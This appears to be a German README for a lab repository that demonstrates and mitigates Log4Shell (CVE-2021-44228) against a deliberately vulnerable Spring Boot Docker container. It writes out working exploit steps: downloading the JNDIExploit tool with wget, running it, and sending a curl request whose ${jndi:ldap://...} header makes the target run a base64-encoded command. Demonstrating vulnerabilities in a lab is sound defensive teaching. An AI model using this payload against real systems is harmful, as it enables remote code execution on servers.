
Dieses Repository dient der Demonstration und Abschwächung der Log4j-2021-Schwachstelle (CVE-2021-44228).
Dieses Repository dient der Demonstration und Abschwächung der Log4j-2021-Schwachstelle (CVE-2021-44228).
Die Schwachstelle CVE-2021-44228 / Log4Shell besteht darin, verwundbare Software mit einer bösartigen Nutzlast zu injizieren, die Log4J dazu auffordert, einen Wert von einer Drittanbieterquelle über JNDI und das LDAP-Protokoll abzurufen. ... Die importierten Daten können Code sein, der von Log4J auf dem System ausgeführt wird.
Wir führen eine Spring-Boot-Webanwendung aus, die in Docker anfällig für CVE-2021-44228 ist, von @christophetd als Log4Shell bezeichnet.
Sie verwendet Log4j 2.14.1 (über spring-boot-starter-log4j2 2.6.1) und das JDK 1.8.0_181.
docker run --name vulnerable-app --rm -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app

Wir laden den JNDI-Exploit für Log4Shell in diesem Fall aus dem Webarchiv herunter, aber du kannst ihn von überall herunterladen, wo er verfügbar ist.
wget https://web.archive.org/web/20211211031401/https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip

Wir ermitteln die IP-Adresse unseres Rechners, auf dem der Docker-Container der Log4Shell-Anwendung läuft.
ifconfig

Wir entpacken das ZIP mit dem JNDI-Exploit für Log4Shell, erhalten so das JAR und führen es mit der in Schritt 3 ermittelten IP aus.
unzip JNDIExploit.v1.2.zip
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i your-private-ip -p 8888

curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-private-ip:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'


docker exec vulnerable-app ls /tmp

Video zur Abschwächung der Log4Shell-Schwachstelle unter Windows und Linux: ABSCHWÄCHUNG

Feryael Justice 2022